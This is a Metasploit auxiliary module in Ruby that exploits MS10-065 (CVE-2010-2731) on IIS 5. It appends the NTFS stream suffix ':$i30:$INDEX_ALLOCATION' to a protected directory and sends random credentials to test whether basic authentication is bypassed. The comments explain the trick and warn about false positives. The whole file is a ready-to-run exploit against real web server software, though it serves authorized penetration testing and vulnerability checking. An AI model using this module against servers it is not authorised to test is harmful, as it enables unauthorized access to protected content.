##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
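class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # NTFS stream name of a directory's index. Requesting "<dir>:$i30:$INDEX_ALLOCATION/"
  # instead of "<dir>/" is the whole trick: on an unpatched IIS 5.x the alternate
  # name is served without the per-directory authentication check (MS10-065).
  STREAM_SUFFIX = ':$i30:$INDEX_ALLOCATION'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
        'Description' => %q{
          This module bypasses basic authentication for Internet Information Services (IIS).
          By appending the NTFS stream name to the directory name in a request, it is
          possible to bypass authentication.
        },
        'References' => [
          [ 'CVE', '2010-2731' ],
          [ 'OSVDB', '66160' ],
          [ 'MSB', 'MS10-065' ],
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
        ],
        'Author' => [
          'Soroush Dalili',
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2010-07-02',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])
      ]
    )
  end

  # Probe TARGETURI (with a trailing slash) and report whether the server
  # demands authentication for it.
  #
  # @return [Boolean] true only for an HTTP 401; a missing response (timeout,
  #   connection failure) counts as "no auth" so that run() stops early.
  def has_auth
    uri = directory_uri

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET'
    })
    vprint_status(res.body) if res

    # NOTE(review): WWW-Authenticate is not inspected, so a 401 from NTLM or
    # Digest passes this gate too, even though the module describes itself as
    # a Basic-auth bypass. The NTFS-stream bypass itself does not depend on the
    # scheme, so this is a wording/triage caveat rather than a defect.
    !res.nil? && res.code == 401
  end

  # Request the target directory through its $INDEX_ALLOCATION stream name,
  # using throw-away credentials, and decide whether the request got past
  # authentication.
  #
  # @return [String] the bypass path (e.g. "/secure:$i30:$INDEX_ALLOCATION/")
  #   when the server answered with anything other than 401/404, else ''.
  def try_auth
    # Append a random "file" to the directory so that File.dirname hands back the
    # directory without its trailing slash ("/" stays "/" for the root).
    probe = directory_uri + Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"
    dir = "#{File.dirname(probe)}#{STREAM_SUFFIX}/"

    # Deliberately bogus credentials: a patched server must still reject these
    # with 401, so a non-401 answer is attributable to the stream-name trick
    # and not to credentials that happen to be valid.
    user = Rex::Text.rand_text_alpha(rand(5..14))
    pass = Rex::Text.rand_text_alpha(rand(5..14))

    vprint_status("Requesting: #{dir}")
    res = send_request_cgi({
      'uri' => dir,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
    return '' unless res

    # Surface the status code: the success test below is permissive, and the
    # operator needs the code to tell a real bypass from a 403/3xx/5xx.
    vprint_status("Response code: #{res.code}")
    vprint_status(res.body)

    # Anything other than 401 (still protected) or 404 (stream name not
    # resolved) is reported as a bypass. That includes 403, redirects and
    # server errors, so confirm a reported hit manually before relying on it.
    (res.code != 401 && res.code != 404) ? dir : ''
  end

  # Entry point: require that the target actually challenges for auth, then
  # attempt the stream-name bypass once and report the resulting path.
  def run
    unless has_auth
      print_error('No basic authentication enabled')
      return
    end

    bypass_string = try_auth
    if bypass_string.empty?
      print_error('The bypass attempt did not work')
    else
      print_good("You can bypass auth by doing: #{bypass_string}")
    end
  end

  private

  # TARGETURI normalized and guaranteed to end in a single trailing '/'.
  # Shared by has_auth and try_auth so both probe the same directory.
  def directory_uri
    uri = normalize_uri(target_uri.path)
    uri.end_with?('/') ? uri : "#{uri}/"
  end
end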